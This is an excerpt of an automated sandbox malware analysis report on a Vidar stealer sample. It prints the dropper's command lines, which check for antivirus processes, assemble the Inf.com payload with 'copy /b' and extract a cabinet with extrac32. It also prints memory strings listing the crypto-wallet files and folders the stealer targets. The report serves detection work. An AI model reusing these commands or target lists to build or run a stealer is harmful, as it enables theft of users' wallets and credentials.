                Source: Yara matchFile source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00A71B4D
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00A1338B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7BBED SendInput,keybd_event,13_2_00A7BBED
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7EC9E mouse_event,13_2_00A7EC9E
                Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AuthorizationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.comJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired mJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com mJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00A714AE
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_00A71FB0
                Source: Inf.com, 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp, Inf.com.2.dr, Name.9.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Inf.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30A08 cpuid 13_2_00A30A08
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A6E5F4 GetLocalTime,13_2_00A6E5F4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A6E652 GetUserNameW,13_2_00A6E652
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_00A4BCD2
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Inf.com, 0000000D.00000002.3268617637.00000000001CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.00000000001CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Inf.com, 0000000D.00000002.3268617637.00000000001CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
